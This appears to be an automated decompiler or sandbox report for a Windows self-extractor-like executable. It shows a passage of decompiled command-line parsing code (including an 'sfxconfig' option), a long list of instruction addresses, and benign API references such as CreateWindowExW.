													__eflags =  *_t1076 - 0x20;
													if( *_t1076 <= 0x20) {
														break;
													}
													_t1076 = _t1076 + _t834;
													__eflags = _t1076;
												}
												while(1) {
													_t801 =  *_t1076 & 0x0000ffff;
													__eflags = _t801;
													if(_t801 == 0) {
														break;
													}
													__eflags = _t801 - 0x20;
													if(_t801 > 0x20) {
														break;
													}
													_t1076 = _t1076 + _t834;
													__eflags = _t1076;
												}
												_t830 = _t1076;
												_t802 = E004043AC(_t1036, _t1076, L"sfxconfig");
												__eflags = _t802;
												if(_t802 == 0) {
													goto L77;
												}
												__eflags =  *_t802 - 0x3a;
												if( *_t802 != 0x3a) {
													L74:
													_t1039 =  *_t802 & 0x0000ffff;
													__eflags = _t1039;
													if(_t1039 != 0) {
														__eflags = _t1039 - 0x20;
														if(_t1039 > 0x20) {
															goto L75;
														}
														L73:
														_t802 =  &(_t802[1]);
														__eflags = _t802;
														goto L74;
													}
													L75:
													_t1050 = _t1102[5];
													_t1102[6] = _t1102[6] & 0x00000000;
													 *(_t1102[5]) = 0;
													_t803 = E004042CA(_t802,  &(_t1102[5]));
													__eflags =  *0x41e7e4 - 2;
													_t830 = _t803;
													if( *0x41e7e4 != 2) {
														E00410F79(_t830, 0x41e79c,  &(_t1102[5]));
													}
													goto L77;
												}
												goto L73;
											}
											_t806 = _t800 - _t834;
											__eflags = _t806;
											if(_t806 == 0) {
												__eflags = _t1076[2] - 0x63;
												 *0x41e7e4 = (0 | _t1076[2] == 0x00000063) + 3;
												goto L64;
											}
											_t810 = _t806 - 1;
											__eflags = _t810;
											if(_t810 == 0) {
												__eflags = _t1036 - 0x44;
												if(_t1036 != 0x44) {
													_t1076 =  &(_t1076[2]);
													__eflags = _t1076;
													L56:
													 *0x41e7e0 =  *0x41e7e0 & 0x00000000;
													__eflags =  *_t1076 - 0x3a;
													if( *_t1076 != 0x3a) {
														L59:
														 *0x41e7e0 = 0xa;
														L60:
														 *0x41e7e4 = 1;
														goto L64;
													}
													_t48 =  &(_t1076[1]); // -2
													_t811 = _t48;
													__imp___wtol();
													_t1036 = _t811;
													 *0x41e7e0 = _t811;
													__eflags = _t811 - 0xe10;
													if(_t811 > 0xe10) {
														goto L59;
													}
													__eflags = _t811;
													if(_t811 != 0) {
														goto L60;
													}
													goto L59;
												}
												__eflags = _t1076[2] - 0x3a;
												if(_t1076[2] != 0x3a) {
													goto L29;
												}
												_t1076 =  &(_t1076[3]);
												while(1) {
													_t812 =  *_t1076 & 0x0000ffff;
													__eflags = _t812 - 0x20;
													if(_t812 <= 0x20) {
														break;
													}
													__eflags = _t812 - 0x3a;
													if(_t812 == 0x3a) {
														break;
													}
													_t1036 = 0x41e7e8;
													E004011EE(0x41e7e8, _t812 & 0x0000ffff);
													_t1076 = _t1076 + _t834;
													__eflags = _t1076;
												}
												__eflags =  *0x41e7ec;
												if( *0x41e7ec != 0) {
													goto L56;
												}
												goto L29;
											}
											_t815 = _t810 - 0xb;
											__eflags = _t815;
											if(_t815 == 0) {
												__eflags = _t1076[2] - 0x3a;
												if(_t1076[2] != 0x3a) {
													goto L14;
												}
												_t817 = (_t1076[3] & 0x0000ffff) - 0x31;
												__eflags = _t817;
												if(_t817 == 0) {
													goto L26;
												}
												_t818 = _t817 - 1;
												__eflags = _t818;
												if(_t818 == 0) {
													_t1079 = 0x5b7;
													goto L15;
												}
												_t819 = _t818 - 1;
												__eflags = _t819;
												if(_t819 == 0) {
													_push(0x1f);
													goto L30;
												}
												_t820 = _t819 - 1;
												__eflags = _t820;
												if(_t820 == 0) {
													_t1079 = 0x3ff;
													goto L15;
												}
												__eflags = _t820 != 1;
												if(_t820 != 1) {
													goto L14;
												}
												goto L43;
											}
											__eflags = _t815 != 7;
											if(_t815 != 7) {
												goto L29;
											} else {
												_t1079 = 0x4f30;
												goto L15;
											}
										}
										L29:
										_push(0x64);
										goto L30;
									} else {
										_push(6);
										_push(1);
										E00408E03(_t1050);
										L26:
										_t1079 = 1;
										goto L15;
									}
								} else {
									_t1102[0x19] = 1;
									while(1) {
										_t1047 =  *_t477 & 0x0000ffff;
										__eflags = _t1047;
										if(__eflags == 0) {
											break;
										}
										__eflags = _t1047 - 0x20;
										if(__eflags > 0) {
											break;
										} else {
											_t477 =  &(_t477[1]);
											__eflags = _t477;
											continue;
										}
									}
									_t830 = _t477;
									goto L24;
								}
							} else {
								_t1079 = E00404DD3(_t476);
								goto L15;
							}
						} else {
							E0040497F(_t830, _t1050, 1, _t1152);
							L14:
							_t1079 = 0;
							L15:
							_push( *(_t1102 - 0x60));
							L00418674();
							E00405221( &(_t1102[0x13]));
							_push( *((intOrPtr*)(_t1102 - 0x6c)));
							L00418674();
							_push(_t1102[5]);
							L00418674();
							_t451 = _t1079;
							L385:
							return _t451;
						}
					} else {
						_t826 = _t474 + 2;
						__imp___wtol(_t826);
						_t35 = _t826 - 1; // -1
						_t844 = _t35;
						if(_t35 <= 0xfffe) {
							 *0x41e6e4 = _t826;
						}
						do {
							_t830 =  &(_t830[1]);
						} while ( *_t830 > 0x20);
						while(1) {
							_t827 =  *_t830 & 0x0000ffff;
							if(_t827 == 0) {
								goto L12;
							}
							__eflags = _t827 - 0x20;
							if(_t827 > 0x20) {
								goto L12;
							} else {
								_t830 =  &(_t830[1]);
								__eflags = _t830;
								continue;
							}
						}
						goto L12;
					}
				}
			}

0x004053a7
0x004053a8
0x004053ac
0x004053ba
0x004053c1
0x004053cd
0x004053df
0x00406c99
0x00406ca7
0x00406caf
0x00000000
0x004053f2
0x004053f2
0x004053f9
0x00000000
0x00000000
0x004053ff
0x00405403
0x0040540a
0x00405411
0x00405418
0x00405421
0x00405425
0x00405429
0x0040542d
0x00405439
0x0040543e
0x00405441
0x00405444
0x00405447
0x00405454
0x00405471
0x0040547a
0x0040547f
0x00405484
0x0040549e
0x004054a1
0x004054b5
0x004054c6
0x004054e6
0x004054ec
0x004054f0
0x004054f5
0x004054f7
0x004054fb
0x00405507
0x00405512
0x00405517
0x0040551c
0x0040555c
0x00405562
0x00405568
0x00405569
0x0040556b
0x004055a4
0x004055aa
0x004055ab
0x004055ad
0x004055c0
0x004055c4
0x004055cb
0x004055cd
0x004055e8
0x004055fc
0x00405602
0x00405604
0x00405617
0x0040561e
0x00405625
0x0040562a
0x00405631
0x00405632
0x0040563b
0x0040563f
0x00405641
0x004057de
0x004057e9
0x004057f6
0x004057fc
0x00405801
0x00405804
0x00405806
0x0040580c
0x00405812
0x0040581c
0x00405820
0x00405825
0x0040582c
0x00405831
0x00405836
0x00405842
0x0040584b
0x00405850
0x00405852
0x00405854
0x0040585a
0x0040585c
0x00405861
0x00405861
0x0040586d
0x0040587d
0x00405882
0x00405887
0x0040588d
0x00405892
0x00405898
0x0040589d
0x0040589d
0x0040589d
0x004058aa
0x004058af
0x004058b1
0x004058b7
0x004058b9
0x004058d4
0x004058d4
0x004058d6
0x004058bb
0x004058bb
0x004058be
0x004058c1
0x004058c4
0x004058c7
0x004058cd
0x004058cf
0x004058cf
0x004058d9
0x004058db
0x004058e0
0x004058e0
0x004058eb
0x004058f0
0x004058f2
0x0040591a
0x00405924
0x0040592a
0x0040592b
0x0040592d
0x00405953
0x00405959
0x004059e7
0x004059e7
0x004059ea
0x004059ef
0x004059f2
0x00405a14
0x00405a14
0x00405a1b
0x004059cb
0x004059cb
0x004059ce
0x004059d4
0x004059d6
0x004059df
0x004059df
0x00000000
0x004059d6
0x00405a1d
0x00405a22
0x00405a5e
0x00405a5e
0x00405a60
0x00000000
0x00000000
0x00405a36
0x00405a43
0x00405a48
0x00405a49
0x00405a50
0x00405a51
0x00405a56
0x00405a59
0x00405a59
0x00405a5c
0x00405a5c
0x00405a66
0x00405a72
0x00405a72
0x00405a7a
0x00405a7d
0x00405a82
0x00405a87
0x00405a88
0x00405a88
0x00405a8c
0x00000000
0x00000000
0x00405a8e
0x00405a8e
0x00405a8e
0x00405a91
0x00405a91
0x00405aa2
0x00405aa2
0x00405aa5
0x00405aa5
0x00405aa8
0x00405aab
0x00405a99
0x00405a9d
0x00000000
0x00000000
0x00405a9f
0x00405a9f
0x00000000
0x00405a9f
0x00405aad
0x00405aad
0x00405ab0
0x00405ab3
0x00405abe
0x00405abe
0x00405abe
0x00405ac1
0x00405ac5
0x00405d31
0x00405d33
0x00405d36
0x00405d39
0x00405d3b
0x00405d3f
0x00405d3f
0x00405d42
0x00405db2
0x00405db4
0x00405d44
0x00405d4a
0x00405d5c
0x00405d67
0x00405d6c
0x00405d6f
0x00405d74
0x00405d77
0x00405d81
0x00405d89
0x00405d8e
0x00405d90
0x00405d90
0x00405db9
0x00405dbe
0x00405dca
0x00405dde
0x00405de9
0x00405dee
0x00405df1
0x00405df6
0x00405df9
0x00405e03
0x00405e08
0x00405e0b
0x00405e1a
0x00405e23
0x00405e28
0x00405e2b
0x00405e2f
0x00405f99
0x00405f99
0x00405fa1
0x00405fab
0x00405fb0
0x00406006
0x00406006
0x00406008
0x0040600a
0x00000000
0x00000000
0x00405fb9
0x00405fc3
0x00405fca
0x00405fcc
0x0040600e
0x00406011
0x00406016
0x00406017
0x00406017
0x0040601e
0x00406025
0x00406027
0x00406027
0x0040602d
0x00406031
0x004060b7
0x004060bb
0x004060bd
0x004060bd
0x004060bd
0x004060c8
0x004060dd
0x004060df
0x004060e2
0x004060e4
0x004061d3
0x004061df
0x004061e4
0x004061e7
0x004061ec
0x004061ee
0x004061f1
0x004061f3
0x004061f3
0x004061f9
0x00406208
0x0040620d
0x00406210
0x00406212
0x00406215
0x0040621b
0x0040621c
0x0040621c
0x00406221
0x00406227
0x00406248
0x0040624f
0x0040625c
0x00406263
0x00406266
0x00406297
0x00406297
0x004062a2
0x004062a7
0x004062aa
0x004062ac
0x00000000
0x00000000
0x004062ae
0x004062b2
0x00000000
0x00000000
0x004062bb
0x004062c2
0x004062c4
0x00406428
0x0040642b
0x00406430
0x00406286
0x00406286
0x00406288
0x0040628d
0x0040628d
0x00406290
0x00000000
0x00406290
0x004062cc
0x004062d7
0x004062da
0x004062dc
0x004062e0
0x004062e0
0x004062e4
0x004062eb
0x004062ed
0x004062ed
0x004062ed
0x004062f7
0x004062f7
0x004062fa
0x004062ff
0x00406303
0x0040637d
0x0040637d
0x00406381
0x00406385
0x00406392
0x00406397
0x0040639a
0x0040639c
0x004063a3
0x004063a6
0x004063ab
0x004063ab
0x004063af
0x004063b3
0x004063c0
0x004063c5
0x004063c8
0x004063ca
0x004063d1
0x004063d4
0x004063d4
0x004063ca
0x004063b3
0x004063d9
0x004063dd
0x00406479
0x00406479
0x00406480
0x004064af
0x004064b8
0x004064bd
0x004064c2
0x004064ca
0x004064ca
0x004064cf
0x004064d2
0x004064d9
0x00406482
0x00406495
0x0040649a
0x0040649d
0x004064a2
0x004064a2
0x004064de
0x004064e4
0x004064ea
0x004064ea
0x004064ef
0x004064f2
0x004064f9
0x004064f9
0x004064fa
0x004064fa
0x004064fc
0x00406502
0x00406506
0x00000000
0x004064f4
0x004064f4
0x004064f7
0x0040650b
0x0040650c
0x00406512
0x00406516
0x00406518
0x00406518
0x00406518
0x0040651f
0x00406526
0x00406533
0x00406538
0x0040653a
0x00000000
0x00000000
0x0040653c
0x00000000
0x00406528
0x0040652a
0x00406541
0x00406541
0x00406543
0x0040656d
0x0040656d
0x00406572
0x00406576
0x00406585
0x00406585
0x0040658c
0x00406591
0x00406595
0x0040659f
0x004065a5
0x004065a6
0x004065a9
0x004065ad
0x004065b0
0x004065b0
0x004065b5
0x004065b8
0x004065c4
0x004065c9
0x004065cc
0x004065cf
0x004065cf
0x004065d5
0x004065d5
0x004065dc
0x00406a2b
0x00406a2b
0x00406a2e
0x00406a33
0x00406a36
0x00406b23
0x00406b23
0x00406b2a
0x00406b2c
0x00406b45
0x00406b53
0x00406b6d
0x00406b72
0x00406b75
0x00406b75
0x00406b7a
0x00406b7d
0x00406b83
0x00406b83
0x00406b8a
0x00406b9c
0x00406b9c
0x00406ba3
0x00406bb5
0x00406bb7
0x00406bba
0x00406bbc
0x00406bc3
0x00406bc9
0x00406bcb
0x00406bcb
0x00406bd6
0x00406bec
0x00406bf6
0x00406c0b
0x00406c0b
0x00406bbc
0x00406c10
0x00406c10
0x00406c14
0x00406c16
0x00406c1d
0x00406c2a
0x00406c2f
0x00406c32
0x00406c34
0x00406c36
0x00406c3a
0x00406c46
0x00406c4b
0x00406c50
0x00406c3a
0x00406c34
0x00406c1d
0x00406c53
0x00406c56
0x00406c5b
0x00406c5e
0x00406c63
0x00406c68
0x00406c6a
0x00406c6f
0x00406c6f
0x00406c72
0x00406c75
0x00406c7e
0x00406c83
0x00406c86
0x00406c8b
0x00406c8e
0x00406c95
0x00000000
0x00406c95
0x00406b8c
0x00406b90
0x00000000
0x00000000
0x00406b92
0x00000000
0x00406b92
0x004065e2
0x00406602
0x00406607
0x0040660f
0x00406614
0x00406617
0x0040661c
0x00406622
0x0040662c
0x00406632
0x00406635
0x00406a42
0x00406a47
0x00406a49
0x00406a4b
0x00406a50
0x00406a53
0x00406a58
0x00406a5b
0x00406a60
0x00406a63
0x00406a68
0x00406a6b
0x00406a70
0x00406a73
0x00406a78
0x00406a7e
0x00406a80
0x00406a89
0x00406a89
0x004056b1
0x004056b1
0x00000000
0x004056b1
0x0040663b
0x0040663f
0x00406643
0x0040664c
0x00406651
0x00406655
0x00406655
0x0040665e
0x00406663
0x00406666
0x00406668
0x00000000
0x00000000
0x004066fc
0x00406701
0x00406704
0x00406706
0x0040671a
0x0040671f
0x00406722
0x00406724
0x0040673e
0x00406743
0x00406746
0x00406748
0x00406760
0x00406765
0x00406767
0x0040676a
0x0040676c
0x00406796
0x0040679d
0x004067a0
0x004067a2
0x004067b8
0x004067bd
0x004067c0
0x004067c2
0x004067dc
0x004067e1
0x004067e4
0x004067e6
0x0040682f
0x0040682f
0x00406831
0x00000000
0x00406831
0x004067ef
0x004067f4
0x004067f7
0x004067f9
0x00000000
0x00000000
0x00406802
0x00406807
0x0040680a
0x0040680c
0x00406821
0x00406821
0x00406823
0x00000000
0x00406823
0x00406815
0x0040681a
0x0040681d
0x0040681f
0x0040683d
0x00406841
0x00406844
0x0040689f
0x004068a4
0x004068a8
0x004068ad
0x004068b0
0x004068c7
0x004068d0
0x004068d6
0x004068dc
0x004069dc
0x004069dc
0x004069e0
0x00406b00
0x00406b00
0x00406b03
0x00406b08
0x00406b0b
0x00406b10
0x00406b13
0x00406b18
0x00406b1b
0x00406b20
0x00000000
0x00406b20
0x004069e6
0x004069ea
0x00000000
0x00000000
0x004069f3
0x004069f5
0x004069f8
0x004069fb
0x004069fe
0x00406a01
0x00406a06
0x00406a09
0x00406a0e
0x00406a11
0x00406a16
0x00406a19
0x00406a1e
0x00406a21
0x004065b0
0x004065b0
0x004065b5
0x004065b8
0x004065c4
0x004065c9
0x004065cc
0x004065cf
0x004065cf
0x00000000
0x004065cf
0x00000000
0x004065b0
0x004068e5
0x004068eb
0x004068ed
0x00000000
0x00000000
0x004068f3
0x004068f6
0x0040690b
0x0040690f
0x00406914
0x00406919
0x004069be
0x004069c1
0x004069c4
0x004069c7
0x004069cc
0x004069cf
0x004069d1
0x00406a9a
0x00406aa0
0x00406aa7
0x00406aac
0x00406ab1
0x00406ab4
0x00406ab9
0x00406abc
0x00406ac1
0x00406ac4
0x00406ac9
0x00406acc
0x00406ad1
0x00406ad4
0x00406ad9
0x00406adc
0x00406ae1
0x00406ae4
0x00406ae9
0x00406aef
0x00406af1
0x00406af6
0x00406af6
0x00406af9
0x00000000
0x00406af9
0x004069d7
0x004069d7
0x00000000
0x004069d7
0x00406925
0x00406971
0x00406976
0x0040697c
0x00406981
0x00406987
0x0040698c
0x00406992
0x004069a3
0x004069a8
0x004069ab
0x004069ae
0x004069b0
0x00406a91
0x00000000
0x00406a96
0x004069b6
0x00000000
0x004069bb
0x004068fc
0x00406906
0x00406906
0x00406909
0x00000000
0x00000000
0x00406903
0x00406903
0x00406903
0x00000000
0x00406906
0x00406846
0x0040684a
0x0040686f
0x0040684c
0x00406851
0x0040685a
0x00406867
0x00406867
0x0040687e
0x00406883
0x00406885
0x00406888
0x0040688a
0x00000000
0x0040688c
0x00406894
0x00000000
0x00406894
0x0040688a
0x00000000
0x0040681f
0x004067c8
0x004067c8
0x004067cb
0x004067ce
0x004067ce
0x00000000
0x004067ce
0x004067ab
0x00000000
0x004067ab
0x0040676e
0x00406775
0x00406777
0x00406777
0x0040677b
0x00406782
0x00406782
0x00406787
0x00000000
0x00406787
0x0040674a
0x0040674c
0x0040674c
0x00000000
0x0040674c
0x00406726
0x0040672d
0x0040672f
0x00000000
0x00000000
0x00000000
0x00406735
0x00406708
0x0040670c
0x0040670c
0x0040666e
0x00406670
0x00000000
0x00406676
0x00406686
0x00406688
0x0040668b
0x0040668d
0x00000000
0x00000000
0x00406692
0x00406695
0x00406698
0x0040669b
0x0040669e
0x004066a5
0x004066a5
0x004066a8
0x004066af
0x004066af
0x004066b2
0x00000000
0x00000000
0x004066b8
0x004066bb
0x00000000
0x00000000
0x004066c1
0x004066c9
0x004066d5
0x004066da
0x004066dd
0x004066e1
0x004066e6
0x004066e9
0x00000000
0x004066ef
0x004066aa
0x004066ad
0x00000000
0x00000000
0x00000000
0x004066ad
0x004066a0
0x004066a3
0x00000000
0x00000000
0x00000000
0x004066a3
0x004065b0
0x00406578
0x0040657f
0x00000000
0x00000000
0x00000000
0x0040657f
0x00406545
0x0040654a
0x0040654d
0x00406552
0x00406555
0x0040655c
0x0040655e
0x00406563
0x00406563
0x00406566
0x00000000
0x00406566
0x00406526
0x00000000
0x004064f7
0x004063e3
0x004063e3
0x004063e7
0x00000000
0x00000000
0x004063ed
0x004063f7
0x004063f9
0x00000000
0x00000000
0x00406407
0x0040640d
0x0040640e
0x00406410
0x00000000
0x00000000
0x00406412
0x00406415
0x0040641b
0x00406469
0x0040646e
0x00406471
0x00000000
0x00406476
0x0040641d
0x00000000
0x00406422
0x004063dd
0x00406305
0x00406308
0x00406310
0x0040631c
0x0040632a
0x0040632f
0x00406332
0x00406334
0x00000000
0x00000000
0x0040633a
0x0040633d
0x00406340
0x00406343
0x0040634a
0x0040634a
0x0040634d
0x00406354
0x00406354
0x00406357
0x0040635e
0x00406366
0x00406372
0x00406375
0x0040637a
0x00000000
0x0040637a
0x00406359
0x0040635c
0x00000000
0x00000000
0x00000000
0x0040635c
0x0040634f
0x00406352
0x00000000
0x00000000
0x00000000
0x00406352
0x00406345
0x00406348
0x00000000
0x00000000
0x00000000
0x00406348
0x0040643d
0x00406442
0x00406445
0x0040644a
0x0040644d
0x00406452
0x00406458
0x0040645a
0x0040645f
0x0040645f
0x00406462
0x00000000
0x00406462
0x00406297
0x00406269
0x0040626f
0x00406271
0x00000000
0x00000000
0x00406273
0x00406275
0x00406276
0x0040627b
0x0040627e
0x00000000
0x00406283
0x00406255
0x00000000
0x00406229
0x0040622d
0x00406232
0x00406232
0x00406235
0x00406237
0x0040623c
0x00406241
0x00000000
0x00406241
0x004060ea
0x004060f1
0x00406109
0x0040611c
0x00406126
0x00406132
0x00406132
0x00406134
0x00406135
0x00406135
0x00406137
0x00406137
0x00406145
0x00406147
0x00406148
0x00406148
0x0040614d
0x0040614f
0x0040614f
0x00406151
0x00406153
0x00406154
0x0040615c
0x00406166
0x00406166
0x0040616c
0x00406172
0x00406172
0x00406172
0x00406175
0x00406178
0x0040617a
0x00406180
0x00406181
0x00406182
0x00406184
0x00406186
0x0040618a
0x0040618b
0x00406193
0x00406193
0x00406193
0x00406186
0x0040619d
0x004061a5
0x004061a8
0x004061a9
0x004061a9
0x004061ae
0x004061b0
0x004061bf
0x004061c4
0x004061c9
0x004061cc
0x00000000
0x004061cc
0x00406037
0x00406041
0x00406046
0x0040604b
0x0040604d
0x00406057
0x00406057
0x0040605f
0x00406074
0x0040607e
0x00406093
0x00406098
0x0040609b
0x004060a0
0x004060a4
0x004060a6
0x004060af
0x004060af
0x00000000
0x004060a6
0x00406031
0x00405fce
0x00405fd1
0x00405fd6
0x00405fd8
0x00405fe5
0x00405fea
0x00405fed
0x00405fed
0x00405fed
0x00405ff0
0x00405ffe
0x00406003
0x00406003
0x00000000
0x00405e35
0x00405e35
0x00405e3c
0x00000000
0x00000000
0x00405e42
0x00405e47
0x00405e49
0x00000000
0x00000000
0x00405e5a
0x00405e75
0x00405eb9
0x00405ed7
0x00405edc
0x00405edf
0x00405ee4
0x00405ee7
0x00405eec
0x00405eef
0x00405ef4
0x00405ef7
0x00405efc
0x00405eff
0x00405f12
0x00405f18
0x00405f20
0x00405f28
0x00405f2b
0x00405f2d
0x00405f63
0x00405f68
0x00405f6b
0x00405f70
0x00405f73
0x00405f78
0x00405f7b
0x00405f80
0x00405f86
0x00405f88
0x00405f88
0x00405f91
0x00405f91
0x00000000
0x00405f88
0x00405f2f
0x00405f34
0x00405f37
0x00405f3c
0x00405f3f
0x00405f44
0x00405f47
0x00405f4c
0x00405f52
0x00405f54
0x00405f59
0x00405f59
0x00405f5c
0x00000000
0x00405f5c
0x00405e2f
0x00405d3d
0x00405d3d
0x00000000
0x00405d3d
0x00405ad1
0x00405ad8
0x00405ada
0x00405b2f
0x00405b31
0x00405b4b
0x00405b52
0x00405b54
0x00405b95
0x00405b97
0x00405bb8
0x00405bba
0x00405bd4
0x00405bdb
0x00405bdd
0x00405c10
0x00405c17
0x00405c19
0x00405c35
0x00405c3c
0x00405c3e
0x00405c70
0x00405c76
0x00405c77
0x00405c79
0x00405c95
0x00405c98
0x00405c9b
0x00405cfe
0x00405d01
0x00405d16
0x00405d16
0x00405d19
0x00405d1c
0x00405d21
0x00405d24
0x00405d29
0x00405a88
0x00405a88
0x00405a8c
0x00000000
0x00000000
0x00000000
0x00405a8c
0x00405a88
0x00405c9d
0x00405ca0
0x00000000
0x00000000
0x00405ca2
0x00405ca5
0x00405cac
0x00405cac
0x00405cb1
0x00405cbc
0x00405cbc
0x00405cbf
0x00405ccb
0x00405ccb
0x00405cd0
0x00405cdb
0x00405ce0
0x00405ce7
0x00405ce9
0x00000000
0x00000000
0x00405ceb
0x00405cee
0x00405d95
0x00405d98
0x00405d9d
0x00405da1
0x00405da3
0x00405da8
0x00405da8
0x00405dab
0x00000000
0x00405dab
0x00405cf4
0x00405cf6
0x00405a88
0x00405a88
0x00405a8c
0x00000000
0x00000000
0x00000000
0x00405a8c
0x00405a88
0x00405cd2
0x00405a88
0x00405a88
0x00405a8c
0x00000000
0x00000000
0x00000000
0x00405a8c
0x00405a88
0x00405cc1
0x00405cc4
0x00000000
0x00000000
0x00405cc6
0x00405cc9
0x00000000
0x00000000
0x00000000
0x00405cc9
0x00405cb3
0x00405a88
0x00405a88
0x00405a8c
0x00000000
0x00000000
0x00000000
0x00405a8c
0x00405a88
0x00405ca7
0x00405caa
0x00000000
0x00000000
0x00000000
0x00405caa
0x00405c7e
0x00405c82
0x00405c83
0x00405c88
0x00405c88
0x00405c8d
0x00405a88
0x00405a88
0x00405a8c
0x00000000
0x00000000
0x00000000
0x00405a8c
0x00405a88
0x00405c40
0x00405c43
0x00405c46
0x00405c49
0x00000000
0x00000000
0x00405c4f
0x00405c52
0x00000000
0x00000000
0x00405c59
0x00405c60
0x00405a88
0x00405a88
0x00405a8c
0x00000000
0x00000000
0x00000000
0x00405a8c
0x00405a88
0x00405c1b
0x00405c20
0x00000000
0x00000000
0x00405c26
0x00405a88
0x00405a88
0x00405a8c
0x00000000
0x00000000
0x00000000
0x00405a8c
0x00405a88
0x00405bdf
0x00405be2
0x00405be5
0x00405be8
0x00405bf3
0x00405bf3
0x00405bf8
0x00000000
0x00000000
0x00405c01
0x00405c02
0x00405c03
0x00000000
0x00405c03
0x00405bea
0x00405bed
0x00000000
0x00000000
0x00000000
0x00405bed
0x00405bbf
0x00405bc3
0x00405bc4
0x00000000
0x00405bc4
0x00405b9c
0x00405ba0
0x00405ba1
0x00000000
0x00405ba1
0x00405b56
0x00405b59
0x00405b5c
0x00405b5f
0x00000000
0x00000000
0x00405b65
0x00405b68
0x00000000
0x00000000
0x00405b6e
0x00405b73
0x00000000
0x00000000
0x00405b7c
0x00405b7d
0x00405b7e
0x00000000
0x00405b7e
0x00405b36
0x00405b3a
0x00405b3b
0x00000000
0x00405b3b
0x00405adc
0x00405adc
0x00405adf
0x00405ae2
0x00405ae5
0x00405aec
0x00405aec
0x00405aef
0x00405af6
0x00405af6
0x00405af9
0x00405b10
0x00405b10
0x00405b13
0x00000000
0x00000000
0x00405b19
0x00405b03
0x00405b03
0x00405b07
0x00000000
0x00405b07
0x00405afb
0x00405afe
0x00000000
0x00000000
0x00405b00
0x00405b00
0x00000000
0x00405b00
0x00405af1
0x00405af4
0x00000000
0x00000000
0x00000000
0x00405af4
0x00405ae7
0x00405aea
0x00000000
0x00000000
0x00000000
0x00405aea
0x00405ab5
0x00405ab8
0x00000000
0x00000000
0x00000000
0x00405ab8
0x00405a88
0x004059fd
0x00405a02
0x00405a05
0x00405a07
0x00000000
0x00000000
0x00405a09
0x00405a0c
0x004059ba
0x004059ba
0x004059bc
0x004059c1
0x004059c1
0x004059c4
0x00000000
0x004059c4
0x00405965
0x0040596c
0x0040596e
0x00000000
0x00000000
0x00405970
0x00405974
0x00405976
0x00405976
0x00405976
0x00405979
0x0040597c
0x0040597f
0x00000000
0x00405981
0x00405981
0x00405981
0x00405985
0x00000000
0x00000000
0x00405987
0x0040598a
0x0040598d
0x00405990
0x00000000
0x00000000
0x00000000
0x00405990
0x00405992
0x00405995
0x00000000
0x00000000
0x0040599c
0x004059a3
0x004059a5
0x00000000
0x00000000
0x004059a7
0x004059a9
0x004059aa
0x004059af
0x004059b2
0x00000000
0x004059b7
0x0040597f
0x0040592f
0x00405931
0x00405932
0x00405937
0x0040593a
0x00405942
0x00405944
0x00405949
0x00405949
0x0040594c
0x00000000
0x004058f4
0x004058fe
0x00405906
0x00405908
0x0040590d
0x0040590d
0x00405910
0x0040564f
0x0040564f
0x00000000
0x0040564f
0x004058f2
0x00405647
0x0040564b
0x00405655
0x0040565e
0x0040565e
0x00405663
0x00405664
0x0040575f
0x00405769
0x00405769
0x00405769
0x0040576d
0x00000000
0x00000000
0x00405767
0x00405767
0x00405767
0x00405779
0x00405779
0x0040577c
0x0040577f
0x00000000
0x00000000
0x00405771
0x00405775
0x00000000
0x00000000
0x00405777
0x00405777
0x00405777
0x00405787
0x00405789
0x00405790
0x00405792
0x00000000
0x00000000
0x00405794
0x00405798
0x004057a5
0x004057a5
0x004057a8
0x004057ab
0x0040579c
0x004057a0
0x00000000
0x00000000
0x004057a2
0x004057a2
0x004057a2
0x00000000
0x004057a2
0x004057ad
0x004057ad
0x004057b0
0x004057b6
0x004057be
0x004057c3
0x004057cc
0x004057ce
0x004057d9
0x004057d9
0x00000000
0x004057ce
0x00000000
0x0040579a
0x0040566a
0x0040566a
0x0040566c
0x0040574d
0x00405758
0x00000000
0x00405758
0x00405672
0x00405672
0x00405673
0x004056cd
0x004056d0
0x0040570e
0x0040570e
0x00405711
0x00405711
0x00405718
0x0040571c
0x00405739
0x00405739
0x00405743
0x00405743
0x00000000
0x00405743
0x0040571e
0x0040571e
0x00405722
0x00405728
0x00405729
0x0040572e
0x00405733
0x00000000
0x00000000
0x00405735
0x00405737
0x00000000
0x00000000
0x00000000
0x00405737
0x004056d2
0x004056d7
0x00000000
0x00000000
0x004056dd
0x004056f8
0x004056f8
0x004056fb
0x004056fe
0x00000000
0x00000000
0x004056e2
0x004056e6
0x00000000
0x00000000
0x004056ec
0x004056f1
0x004056f6
0x004056f6
0x004056f6
0x00405700
0x00405707
0x00000000
0x00000000
0x00000000
0x00405709
0x00405675
0x00405675
0x00405678
0x00405689
0x0040568e
0x00000000
0x00000000
0x00405698
0x00405698
0x0040569b
0x00000000
0x00000000
0x004056a1
0x004056a1
0x004056a2
0x004056c3
0x00000000
0x004056c3
0x004056a4
0x004056a4
0x004056a5
0x004056bf
0x00000000
0x004056bf
0x004056a7
0x004056a7
0x004056a8
0x004056b5
0x00000000
0x004056b5
0x004056aa
0x004056ab
0x00000000
0x00000000
0x00000000
0x004056ab
0x0040567a
0x0040567d
0x00000000
0x0040567f
0x0040567f
0x00000000
0x0040567f
0x0040567d
0x0040564d
0x0040564d
0x00000000
0x00405606
0x00405606
0x00405608
0x00405609
0x00405610
0x00405610
0x00000000
0x00405610
0x004055cf
0x004055cf
0x004055de
0x004055de
0x004055e1
0x004055e4
0x00000000
0x00000000
0x004055d5
0x004055d9
0x00000000
0x004055db
0x004055db
0x004055db
0x00000000
0x004055db
0x004055d9
0x004055e6
0x00000000
0x004055e6
0x004055af
0x004055b6
0x00000000
0x004055b6
0x0040556d
0x0040556d
0x00405572
0x00405572
0x00405574
0x00405574
0x00405577
0x00405580
0x00405585
0x00405588
0x0040558d
0x00405590
0x00405597
0x00406cb0
0x00406cb7
0x00406cb7
0x00405524
0x00405524
0x00405528
0x0040552f
0x0040552f
0x00405538
0x0040553a
0x0040553a
0x00405540
0x00405540
0x00405543
0x00405554
0x00405554
0x0040555a
0x00000000
0x00000000
0x0040554b
0x0040554f
0x00000000
0x00405551
0x00405551
0x00405551
0x00000000
0x00405551
0x0040554f
0x00000000
0x00405554
0x0040551c

APIs

?_set_new_handler@@YAP6AHI@ZP6AHI@Z@Z.MSVCRT ref: 004053BA

Part of subcall function 00402107: GetModuleHandleW.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,004053C6,?,00000000), ref: 00402113
Part of subcall function 00402107: CreateWindowExW.USER32 ref: 00402130
Part of subcall function 00402107: GetDesktopWindow.USER32 ref: 0040213C
Part of subcall function 00402107: GetWindowRect.USER32 ref: 00402143
